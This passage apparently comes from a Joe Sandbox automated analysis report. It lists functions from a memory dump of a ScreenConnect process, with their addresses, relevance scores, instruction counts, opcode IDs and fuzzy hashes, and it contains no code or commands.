                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: a60f3acc38da00cc15bc329dc6fbc6664cd5f04281d94da72bc2812e978afb82
                                                                                                                                                                                                                                                                          • Instruction ID: aa1d797722005a6106da019a426620243ba0f534147985c3f80fa5fa56c09d38
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a60f3acc38da00cc15bc329dc6fbc6664cd5f04281d94da72bc2812e978afb82
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31FD71B042455F8715EB38A880A6F7BEAEF8631071485BEE825EB345EF30DD08CB90
                                                                                                                                                                                                                                                                          Function 00BA6FF8 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                          • API String ID: 0-1334834377
                                                                                                                                                                                                                                                                          • Opcode ID: 899df509fb93411dbd908626462d38a537df147c277e96024f99d90751a90ec5
                                                                                                                                                                                                                                                                          • Instruction ID: 090da200ce7bf10165d89856db1e49da8dbd989ff0ba9434d65d479a47622836
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 899df509fb93411dbd908626462d38a537df147c277e96024f99d90751a90ec5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC310031B102055B8758EB78A880A5F77EAEF89710714857DE826DB344EF70EE088BD0
                                                                                                                                                                                                                                                                          Function 00BAE4F9 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: LRjq
                                                                                                                                                                                                                                                                          • API String ID: 0-665714880
                                                                                                                                                                                                                                                                          • Opcode ID: 6037cf44e3ce3d9b9148ad1cad341f57f118988f65cf2ab2a60c2e78850485d8
                                                                                                                                                                                                                                                                          • Instruction ID: 9be697c81b74df27fe4360c32f13b7014b2d5660619654690b66cff1c8b400f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6037cf44e3ce3d9b9148ad1cad341f57f118988f65cf2ab2a60c2e78850485d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A421A331B042049BD718EF65DC59BAF7AF6BB89710F1844ADE502AB290EE719C41CB51
                                                                                                                                                                                                                                                                          Function 00BA5400 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: $jq
                                                                                                                                                                                                                                                                          • API String ID: 0-2886413773
                                                                                                                                                                                                                                                                          • Opcode ID: c772c9dd913027ef49c2174c1d30d5ed0eaf5fa1048c6ff15a79df5cd2a3c283
                                                                                                                                                                                                                                                                          • Instruction ID: dd48476b5ee0cd6b63d330f6b8ba080848744150997f064d340d7409408dc30d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c772c9dd913027ef49c2174c1d30d5ed0eaf5fa1048c6ff15a79df5cd2a3c283
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E04F305496008FC721CF24D5505123BF0AF1A61135641DAD848CF676C621CC51DA21
                                                                                                                                                                                                                                                                          Function 00BAD078 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3c313e808735227e6d56626670c30898478adcb9f9707391e8e5fa5026b3921a
                                                                                                                                                                                                                                                                          • Instruction ID: bb011a9086735344cb59798a0eec72d6fd2cfe9f06e01571eb173b396874a86c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c313e808735227e6d56626670c30898478adcb9f9707391e8e5fa5026b3921a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46A11634B002088FCB14DBA8C994AAEBBF6EF89300F1445A9E506EB365DB75ED05CF50
                                                                                                                                                                                                                                                                          Function 00BAD069 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0d20cd8772b36a2a0af603711ea1659595bc219d356e65d93514eb0f401058aa
                                                                                                                                                                                                                                                                          • Instruction ID: e92c7a256591fa5f10331edc38c810e5a8265d0d21e92d9495a04085d1fc93fa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d20cd8772b36a2a0af603711ea1659595bc219d356e65d93514eb0f401058aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A11734B402088FCB14DFA8C994AADBBF6EF89300B1445A9E506EB365DB75ED05CF51
                                                                                                                                                                                                                                                                          Function 00BAE308 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6d81301518191b018a679fd27b37823bc5200d9d0d7f2dec84b42598cfc61161
                                                                                                                                                                                                                                                                          • Instruction ID: 5eccf9090dddcadfdcefa5ff6fed4e25e95b4b7abe53e9bf43dffa108c965e48
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d81301518191b018a679fd27b37823bc5200d9d0d7f2dec84b42598cfc61161
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56515D34B002058FCB14DFB8D99496EB7E6EF99310B1484A9E556CF329EB34EC06CB90
                                                                                                                                                                                                                                                                          Function 00BAE318 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1fd0ee38c3c4786c29c571547f0b7ff37fd2881ffae5bbf0b08c868566b2e8b6
                                                                                                                                                                                                                                                                          • Instruction ID: 643f28c49f8dcd0b953b637f2ab10719ad8410983591e2a61d07192b5583e7db
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd0ee38c3c4786c29c571547f0b7ff37fd2881ffae5bbf0b08c868566b2e8b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4514D34B002058FCB14DFA8D99496EB7EAEF99310B1484A9E556CF325EB74EC06CB90
                                                                                                                                                                                                                                                                          Function 00BA5DF0 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3839c40a1b63c3d8a25de007bfb9fd2cfef61153305477d79bc6822efed7b8dd
                                                                                                                                                                                                                                                                          • Instruction ID: dd65e6514a25428de57a7b8dff31da7b51284df7f6b6def5efcd672bedf426f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3839c40a1b63c3d8a25de007bfb9fd2cfef61153305477d79bc6822efed7b8dd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D851AD707106068FCB64EB28D954A6F77E6EF88310B1484B8E906DB3A5EF35DE45CB90
                                                                                                                                                                                                                                                                          Function 00BA5DE0 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 65d25c28e15d08c1d05b5280c26c2fe9101988869402825d448982d4d1da4e8c
                                                                                                                                                                                                                                                                          • Instruction ID: 39fe8b2d212c67e543f4f719ad5ec77895e91291c91b5685949f2a54ff59c4cc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65d25c28e15d08c1d05b5280c26c2fe9101988869402825d448982d4d1da4e8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15519F707106068FCB64EB28D954A6F77E6EF89300B1484B8D906DB3A5EF35EE45CB90
                                                                                                                                                                                                                                                                          Function 00BA84A0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: e752bf1a329f365df185f23729a259f823907ac2ab41675e1afc4e18c65d8bf9
                                                                                                                                                                                                                                                                          • Instruction ID: 976db0af53d0aa8cb1fefad4ff06b67738df22f0d7f7867f574b0971b5e9c32a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e752bf1a329f365df185f23729a259f823907ac2ab41675e1afc4e18c65d8bf9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C510A306007058FD724DF29D994A56B7F2FF8E325B244AACD4968BBA4DB31E806CB40
                                                                                                                                                                                                                                                                          Function 00BAB2D0 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8a25a457911ce811f1bbd2e33f35c2db3678d5f6160a74a4543dc7f80bad8f3d
                                                                                                                                                                                                                                                                          • Instruction ID: a3775a6591694389717245bd1b4a207059607bbef14ede605cb7f103c055c0e8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a25a457911ce811f1bbd2e33f35c2db3678d5f6160a74a4543dc7f80bad8f3d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51A070E403098FCB01DFB8D844B9EBBF5FF89310F1085A9E514AB265DB74A989CB90
                                                                                                                                                                                                                                                                          Function 00BAB2C0 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 80c9abd6ae262bc67e60f8d272e5ab5ada8bc65459a01a19f94111ad3c37d80f
                                                                                                                                                                                                                                                                          • Instruction ID: 679c33b11d37004a89bc0f3085d4e606299dbdff9c3a8c003736517525065410
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80c9abd6ae262bc67e60f8d272e5ab5ada8bc65459a01a19f94111ad3c37d80f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78515C74E402099FDB01DFA8D844BDEBBF5FF89310F108599E114AB2A5DB74A989CB90
                                                                                                                                                                                                                                                                          Function 00BA9968 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 2f0b3033add5eeb79b1eaf73d7be8c9bee7b7970a282674265142b9007a32a00
                                                                                                                                                                                                                                                                          • Instruction ID: 7456923f6565cf6a0c3a815ebb2982ec88d84b349b596bb9fd8b2fd11bf1ea4d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0b3033add5eeb79b1eaf73d7be8c9bee7b7970a282674265142b9007a32a00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A414A307502148FC718DB79D894AAEBBF6EF89710B2485A9E406EB3A1DF749D05CB90
                                                                                                                                                                                                                                                                          Function 00BA7920 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ab91312e85829f3bf97c0af2e006674e5b94390909b64698b0a9c68f9d334128
                                                                                                                                                                                                                                                                          • Instruction ID: 14fe6f78a05c9fd1bb6127b0942742f8fce2b5c041f6256df8bf24202971fe8a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab91312e85829f3bf97c0af2e006674e5b94390909b64698b0a9c68f9d334128
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE317030B582059BDB14DF69C8546AFF7F6EF8A354F1484AAD406E7264DF31DD018790
                                                                                                                                                                                                                                                                          Function 00BA9978 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f0e0c12b69d6589f4185674e8367d3fe7f50a3352bb62c2d1cc6f79cd80a5185
                                                                                                                                                                                                                                                                          • Instruction ID: 47826a07771e500ae8920ca0160e966459415362448e97970f34d8697505a38a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0e0c12b69d6589f4185674e8367d3fe7f50a3352bb62c2d1cc6f79cd80a5185
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA415C307502148FC718EB79D894AAEBBF6EF89710B2485A9E406DB3A1DF709D04CB90
                                                                                                                                                                                                                                                                          Function 00BA52F8 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8af836c74359217c491d2cd006235f5bfb8ec0aa565e858c298c8e7d65d70a3c
                                                                                                                                                                                                                                                                          • Instruction ID: 3a6103579cc123e987011a2c29f88d1ac90a36f03383d21eeb26bfe081eb531c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8af836c74359217c491d2cd006235f5bfb8ec0aa565e858c298c8e7d65d70a3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D318C71D046089FCF14DFA9C444AEEBBF4EF89310F14846AD409A3241DB78A941CFA4
                                                                                                                                                                                                                                                                          Function 00BA36B0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 177f011ae337851e85814cd7554db4e964e0e911e1cc6feb2cc26bf20fdc5525
                                                                                                                                                                                                                                                                          • Instruction ID: d6cd7bd275f0e1495ca4615263fcff569f1b9e24e30ed4b62969ca516d764940
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 177f011ae337851e85814cd7554db4e964e0e911e1cc6feb2cc26bf20fdc5525
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD3102B5A04248CFCB04EFB4D94896EBBF4FF46711B1085AAE915D7262DB309E00CB61
                                                                                                                                                                                                                                                                          Function 00BADC08 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: eff08a36b1295190a99f761fde3f14bcba79bb0cd15157665c89d06ca93dbd22
                                                                                                                                                                                                                                                                          • Instruction ID: f4fafc0c34797daadbb341435a234f40d26fbaa7f9c28e45b0b9d6102107d390
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eff08a36b1295190a99f761fde3f14bcba79bb0cd15157665c89d06ca93dbd22
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45312C74604B058FC730DF29D844666BBF1FF4A320B144AADD4979BAA5D770E94ACF80
                                                                                                                                                                                                                                                                          Function 00BA6568 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5d875bfbcff042b3a92f170fad0111d22abc0d424ad703263436f5cd4ea22a3a
                                                                                                                                                                                                                                                                          • Instruction ID: 57f481a2e3c0892da4daa3ac95e334e5a0b1fbc3f2a2c479ff04043d28726374
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d875bfbcff042b3a92f170fad0111d22abc0d424ad703263436f5cd4ea22a3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD314F74A047058FC734DF29C844A6AB7F5EF9A314B184A6CD456CB7A4DB30E946CF90
                                                                                                                                                                                                                                                                          Function 00BADC18 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 13515f7c9318693021dbc684ba58a1575e310109387e87cf2daf57b279d0f26d
                                                                                                                                                                                                                                                                          • Instruction ID: 6a3e4ba92e60e330d1a7c58a996fafae2912c9abcd63f25c91f5edd397d04660
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13515f7c9318693021dbc684ba58a1575e310109387e87cf2daf57b279d0f26d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6312B70604B058FC730DF29D848666BBF1EF4A320F104AA9D4979BAA5D770E94ACF80
                                                                                                                                                                                                                                                                          Function 00BA90A8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1815fd79bb316dc79e1034eb67733c244f414e04950cdf3a40277df188f869e4
                                                                                                                                                                                                                                                                          • Instruction ID: 18f41949180b65e56b0bfbce99e36aae548f7846eff8cb12d276eb34c6a35456
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1815fd79bb316dc79e1034eb67733c244f414e04950cdf3a40277df188f869e4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C316D306007058FC734DF29D888A6BB7F2EF8A721B144A6CD496DB7A0D730E945DB91
                                                                                                                                                                                                                                                                          Function 00BADDC0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c8c68da194c9b4b820b25e2af817eed66d672a04350f33934a8f954a92134698
                                                                                                                                                                                                                                                                          • Instruction ID: 113753105fca32b74bc9f097c6ec80ef5f720a556bc608675c3fcf48cb11f19a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8c68da194c9b4b820b25e2af817eed66d672a04350f33934a8f954a92134698
